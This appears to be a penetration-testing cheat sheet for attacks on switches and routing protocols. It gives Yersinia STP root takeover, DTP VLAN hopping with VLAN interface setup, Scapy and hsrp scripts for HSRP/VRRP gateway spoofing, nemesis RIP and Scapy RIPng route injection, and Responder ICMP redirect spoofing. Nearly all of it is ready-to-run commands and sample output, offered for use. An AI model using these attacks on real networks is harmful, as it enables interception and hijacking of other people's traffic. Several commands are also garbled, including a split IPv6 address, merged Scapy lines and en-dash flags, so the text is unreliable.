Vlans & Wired networking

Spanning Tree Protocol (SPT) & Bridge Protocol Data Unit (BPDU):

Yersinia

result:

┌── yersinia 0.7.3 by Slay & tomac - STP mode ─────────────────────[10:29:40]┐
│    RootId            BridgeId          Port       Iface Last seen          │
│    5080.760F0E13AC58 CB09.E7CD90117CAA 8002       eth1  26 Aug 10:29:39    │
│    5080.760F0E14AC58 CB09.E7CD90127CAA 8002       eth2  26 Aug 10:29:38    │

bridge adapters (requires two) into each switch:

# bridge adapters
ettercap -T -i eth1 -B eth2 -q

# Run Yersinia
Yersinia 
I
# Select Spanning Tree Protocol 
g
# select root role :) 
x
4

Dynamic Trunking Protocol (DTP)

git clone https://github.com/commonexploits/dtpscan.git
cd dtpscan/
chmod a+x dtpscan.sh
./dtpscan.sh

result:

[-] Now Sniffing DTP packets on interface eth1 for 90 seconds.
[+] DTP was found enabled in it's default state of 'Auto'.
[+] VLAN hopping will be possible.

Run Yersinia:

yersinia –I
# select adapter 
g
# select DTP
l
# see data from available VLANs using the 802.1Q menu 
g
# this will reveal the vlan i.e.:
┌── yersinia 0.7.3 by Slay & tomac - 802.1Q mode ────────────────[15:00:08]┐
│ VLAN L2Prot Src IP         Dst IP         IP Prot Iface  Last seen       │
│ 0250 ARP    10.121.5.1     10.121.5.17?   UKN      eth1  11 Aug 14:51:00 │
│ 0250 ARP    10.121.5.235   10.121.5.1?    UKN      eth1  11 Aug 14:52:13 │
│ 0250 ARP    10.121.5.87    10.121.5.1?    UKN      eth1  11 Aug 14:52:20 │

Using this, attacking VLAN 250:

modprobe 8021q
# add vlan
vconfig add eth1 250
# reset DHCP
dhclient eth1.250
#check 
ifconfig eth1.250
# scan
arp-scan -I eth1.250 10.121.5.0/24

HSRP & VRRP

Hot Standby Routing Protocol (HSRP)

scapy
>>> ip = IP(src='10.0.0.100', dst='224.0.0.2')
>>> udp = UDP()
>>> hsrp = HSRP(group=1, priority=255, virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp, iface='eth1', inter=3, loop=1)

Result:

┌── yersinia 0.7.3 by Slay & tomac - HSRP mode ───────────────────[18:29:40]┐
│    SIP         DIP          Auth     VIP         Iface Last seen          │
│    10.0.0.2    224.0.0.2    abc123   10.0.0.1    eth1  26 Aug 18:28:09    │
│    10.0.0.3    224.0.0.2    abc123   10.0.0.1    eth1  26 Aug 18:26:06    │

To include an authentication string within the HSRP packets, use hsrp:

while (true); do (hsrp -i eth1 -d 224.0.0.2 -v 10.0.0.1 -a abc123 -g 1 –S 10.0.0.100; sleep 3); done

Virtual Routing Resolution Protocol (VRRP)

tcpdump 

13:34:02 0:0:5e:0:1:1 1:0:5e:0:0:12 ip 60 10.0.0.7 > 224.0.0.18 VRRPv2-advertisement 
20: vrid=1 prio=100 authtype=simple intv1=1 addrs: 10.0.0.8 auth "abc123" [tos 0xc0] 
(ttl 244, id 0, len 40)
0x0000   45c0 0028 0000 0000 ff70 19e4 c0a8 0007        E..(.....p......
0x0010   e000 0012 2101 6401 0101 dd1f c0a8 0007        ....!.d.........
0x0020   6162 6331 3233 0000 0000 0000 0000 0000        abc123..........

You can then use Scapy to craft VRRP packets:

scapy
Welcome to Scapy (2.2.0)
>>> ip = IP(src='10.0.0.100', dst='224.0.0.18')
>>> udp = UDP()>>> vrrp = VRRP(vrid=1, priority=255, addrlist=["10.0.0.7", "10.0.0.8"], ipcount=2, \auth1='abc123')
>>> send(ip/udp/vrrp, iface='eth1', inter=3, loop=1)

Routing Information Protocol (RIP)

3 version -

RIPv1

nemesis rip –c 2 –V 1 –a 1 –i 10.2.0.10 –m 1 –V 1 –S 10.0.0.100 –D 10.0.0.5

RIPv2

nemesis rip –c 2 –V 2 –a 1 –i 10.2.0.10 –k 0xffffffff –m 1 –V 1 –S 10.0.0.100 -D 10.0.0.5

RIPng (IPv6)

scapy
load_contrib("ripng") 
ip = IPv6(src="2001
cafe:babe::1", dst="ff02::9") 
udp = UDP() 
ripng = RIPngEntry(prefix="2001:1234:dead:beef::/64", nexthop="2001:1234:cafe:babe::1")
send (ip/udp/ripng, iface='eth0', inter=3, loop=1)

Enhance Interior Gateway Routing Protocol (EIGTRP)

TBC

Open Shortest Path First (OSPF)

TBC

Internet Control Message Protocol (ICMP) redirect spoofing

cd /usr/share/responder/ 
chmod a+x Icmp-Redirect.py
./Icmp-Redirect.py –I eth0 –i 10.0.0.100 –g 10.0.0.1 –t 10.0.0.5 –r 10.2.0.10